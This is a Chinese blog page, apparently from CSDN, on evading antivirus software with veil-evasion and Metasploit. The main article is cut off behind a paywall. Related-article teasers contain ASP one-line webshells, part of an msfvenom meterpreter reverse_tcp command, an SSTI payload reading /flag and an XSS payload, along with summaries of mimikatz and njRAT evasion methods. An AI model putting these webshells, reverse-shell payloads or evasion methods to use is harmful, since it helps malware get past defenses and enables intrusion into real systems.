绕过杀软的各种姿势

最新推荐文章于 2025-06-12 14:40:02 发布
最新推荐文章于 2025-06-12 14:40:02 发布
阅读量4k 收藏 13
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 渗透测试 文章标签: metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_34841823/article/details/54584029
本文介绍了两种绕过杀软的方法。首先通过veil-evasion工具生成免杀payload,并展示了如何设置参数。接着,分享了如何手写payload,包括创建随机偏移和C语言shellcode。此外,讨论了动态行为免杀,特别是针对symantec的策略,如使用reverse_https或reverse_tcp_rc4 payload,并通过metasploit的stageencoder选项进行编码以防止查杀。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.payload免杀工具---veil-evasion的使用:

在kali上用apt-get install veil-evasion先自动安装好:

成功安装之后可以看到有46个payload可以使用

可以使用list命令列出看可以使用的payload

这里我们使用5号payload进行尝试:

设置好一些必要的参数:

最低0.47元/天 解锁文章

200万优质内容无限畅学
mimikatz免手段来绕过的限制
LiBai'S BLOG
11-12 5万+
在内网渗透过程中,我们常常需要利用mimikatz工具dump出lsass进程来获取明文密码或者hash。但是一般对mimikatz的查比较严,对lsass进程的管控也很严格。所以我们需要用到一些免手段来绕过的限制,方法网上特别多,下面讲讲我自己实践过的几种。
SQL注入绕过
m0_47599604的博客
03-11 361
目录 asp木马收集 简单的aspx免 过狗的一句话 双写绕过 常见绕过思路 绕过空格的过滤 SQL注入防御 asp木马收集 <%eval request("chopper")%> <%execute request("chopper")%> <%execute(request("chopper"))%> <%ExecuteGlobal request("chopper")%> <%Eval(Request(chr(35
通过DNS传输后门来绕过
02-25
在本篇文章里,我想解释怎么样不使用加密数据的方法也能绕过,同时我也想在github上分享源代码。https://github.com/DamonMohammadbagher/NativePayload_DNS我想使用DNS协议来传输我的后门载荷,从攻击者的机器到客户端机器。这种情况下,我们的后门代码就不需要是硬编码的或者加密的了。因此被检测出来的风险就很低了。因为在大多数的网络里DNS流量都是有效的,IPS/IDS或者硬件防火墙都不会监控和过滤DNS流量。我知道你可以使用SNORTIPS/IDS或者类似的东西来检测DNS流量,但是在DNS流量里使用特征检测出新的载荷非常困难。当然网络管
手段另辟蹊径!可轻松绕过近90%【附带反制教程】
2401_84215240的博客
09-26 1691
众所周知,免技术一直是网络安全技术的一个重头戏在日新月异的网络安攻防时代,各种木马免手法层出不穷,从单一特征码到复合特征码,防御手段也从无主动防御到有主动防御,一直不断地在演变着。但很多木马免技术都只是停留在对特征码的混淆上,也就是代码绕过层面。但是,传统的木马都是两点一线的远控,一个被控制端,一个远程控制端,高级一点的会构建一套大型的僵尸网络系统,其本质没有太大的变化,都是控制端和被控制端的直接传输。
【2025版】最新的一种简易的免绕过方法,(非常详细)从零基础到精通,收藏这篇就够了!
最新发布
leah126的博客
06-12 589
既然exe直接GG,那就只能祭出shellcode大法了。作者把exe转成shellcode,然后用“提供的py脚本”进行加密。生成之后将123.txt放到config目录下利用提供的py脚本将123.txt shellcode加密之后可以看到生成了123.dat不得不说,这种加密方式确实能绕过一些简单的查。但是,只要稍微有点经验的安全工程师,就能通过分析流量、内存等方式,轻松找到解密密钥,然后反推出原始shellcode。
动态加载 ShellCode绕过
优快云
08-11 6141
反病毒解决方案用于检测恶意文件,并且通常使用静态分析技术来区分二进制文件的好坏。如果是恶意文件本身包含恶意内容(ShellCode),那么依靠静态分析技术会非常有效,但如果攻击者使用轻量级的stager来代替下载并将代码加载到内存中,会发生什么?事实证明这样做可以绕过大多数的查。虽然这种绕过方法并不是新鲜技术,但绕过反病毒件对于大多数后门来说都是必要的,在这篇文章中,我们将使用virscan作为我们的检测工具,并使用Metasploit生成一些反向的ShellCode作为我们的攻击载荷。
简单的手法过
2302_76827504的博客
03-28 240
对于做免来讲,我们要做的其实是把木马等文件的特征码进行隐藏。让识别不出原有特征,这样我们也就达到了免的目的。
Payload分离免绕过
干铮的博客
10-14 3181
Payload分离免绕过 件的原理是根据特征、行为、基于云查,云查主要是根据特征码进行查,每一种件都会检测头文件,所以可以进行程序段代码分离的形式,绕过当前主流。 1.C语言编译后门 root@iZ2ze0r5hel5o5dt2w9uluZ:~# msfvenom -a x86 --platform Windows \ > -p windows/meterpreter/reverse_tcp \ > -b '\x00\x0b' LHOST=123.56.138
"2020年06月,Mimikatz的18种免姿势及防御策略
最后,免姿势0x08是通过在mimikatz.exe的基础上进行代码修改来绕过的监控。为防止此类攻击,我们可以实时监控mimikatz.exe的MD5值,一旦发现异常变化,及时对其进行隔离处理。 针对以上18种免姿势,我们还...
TideSec远控免学习四(BackDoor-Factory+Avet+TheFatRat)
fa1lr4in的小博客
02-12 3513
BackDoor-Factory 介绍 BackDoor-factory,又称后门工厂(BDF),BDF是也是一款老牌的免神器,其作者曾经在2015年的blackhat大会上介绍过该工具。但是作者已经于2017年停止更新,免效果就算现在来看也还算不错的。 原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成payload,并且在程序执行的时候,jmp到代码段,来...
构建API调用框架绕过hook
hongduilanjun的博客
05-09 817
我们知道在API函数的监控上一般有两种手段,一种是在3环直接通过挂钩到自己的函数判断是否调用了这个API,另外一种方式就是在0环去往SSDT表的路径上挂钩来判断进0环后的操作。那么我们如果不想监控我们的行为,之前提过的内核重载是一种绕过的方式,但是内核重载的动静太大,这里我们就通过直接重写3环到0环的API,通过重写KiFastCallEntry来自己调用内核的函数,以达到规避的效果。 调用过程 我们首先来看一下API函数的调用过程,这里以OpenProcess函数为例 首先在kernel32
如何优雅的绕过获取系统权限
hl1293348082的专栏
03-31 730
本文内容带有一定的攻击性,仅供学习交流使用,严禁用于非法用途 件判断病毒木马的方式如下: 特征库扫描法:检查文件中是否存在与常见病毒相同的代码。如果匹配,则说明存在病毒。由于该方法较慢,因此现在一般使用通配符扫描法进行代替。 云扫描法:将可疑文件上传到云服务器进行检查。需要网络连接。 虚拟机脱壳法:使用虚拟机引擎进行文件脱壳(仅支持部分壳类型)。脱壳后的文件将会进一步接受上两种扫描方式的检查。 虽然 github 上有许多大牛写的脚本可以生成免的 payload,但往往都好景不长,所以今天
工作原理以及如何免绕过
Makboli的博客
10-12 1870
【免】五分钟简单了解一下免
挖洞经验之一个绕过某SRC厂商三处XSS过滤的payload
weixin_30526593的博客
03-19 280
前言 在某次src的漏洞挖掘过程中,发现了一个payload绕过了三处xss过滤,个人觉得还是挺有意思的,所以记录一下。 从一个被忽略的self xss说起 在某页面信息如下,我决定对回复内容进行xss测试: 插入一个<img/src=1>以后可以看到标签成功解析: 继续深入测试的时候却发现了问题,我们的pa...
绕过(二)——免exe文件(360、火绒免
W小哥
06-12 2万+
攻击机: win7 IP: 192.168.32.134 靶机: windows server 2012(安装360、火绒) IP: 192.168.32.133第一步:使用njRAT生产一个客户端exe木马 输入回连端口号8888,点击start 配置客户端木马的回连地址:192.168.32.134 将文件保存在桌面 开启360毒,直接报毒,不免 1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开 打开之后,将base6
ssti详解与例题以及绕过payload大全
HoAd'blog
02-10 1万+
ssti详解与例题以及绕过payload大全 [BJDCTF2020]Cookie is so stable user=1231{{2*4}} 判断是不是ssti user={{system('ls')}} 执行命令,但不能成功,,好像是空格不可以 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 这是最后的payload https://0day.work/jinja2
如何判断你是个牛×黑客:使用C#加密攻击载荷来绕过
weixin_33878457的博客
09-12 317
本文讲的是如何判断你是个牛×黑客:使用C#加密攻击载荷来绕过件,衡量一个成功黑客和一款牛×的恶意攻击件的重要指标之一,就是看其能否绕过所有的件。 不过万事万物都是个矛盾体,因为一旦一种很牛×的绕过技术被公之于众,那件的公司就会对这种技术进行分析并找到应对之策。 不过今天,我会公开一个技术,就是使用C#加密攻击载荷,就目前来看使用该...
一种“白技术”利用绕过执行payload
qq_35586293的博客
09-16 1558
曾经在学校接触过APT攻击,抱着对其心技术的兴趣。闲来无事,自己也尝试着利用“白利用”技术构造钓鱼文档执行payload,侥幸的是也成功绕过瑞星、火绒等件。 在本文中,我将向大家介绍一种APT常用的攻击手法,通过构造恶意的宏文档执行payload。 本次构造的payload所使用的一款白程序是certutil.exe。该程序是一个Windows系统的内置程序,用于管理Windows中的证书。...
shiro的payload长度限制绕过
Thunderclap的博客
02-08 4317
yishiro反序列化漏洞常规利用点在数据包的header头中,在这里直接插入目标代码,生成的payload是很长的,肯定会超过中间件 header 长度限制,如何解决这个问题呢?将如上base64编码的内容复制到burpsuite中,作为calssData的值,在发送请求,即可执行字节码中的内容,弹出计算器。新建项目修改pom,添加如下两个依赖,一个是tomcat的,一个是springframework的。通过以往的构造payload的exp.py代码如下,构造header头的类构造器。
xss绕过,payload全集
热门推荐
spang_33的博客
07-05 2万+
XSS总结:        xss分为三种,反射型xss,DOM型XSS及存储型XSS,不同类型的XSS的危害不同,有兴趣的可以观看一下csdn上明智讲的关于XSS攻击及原理。https://edu.youkuaiyun.com/course/detail/8585里面的修复原理和补丁代码讲的还是很详细的,他的课程还有利用xss获取cookie等。&lt;img src=x onerror=alert(1)&...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值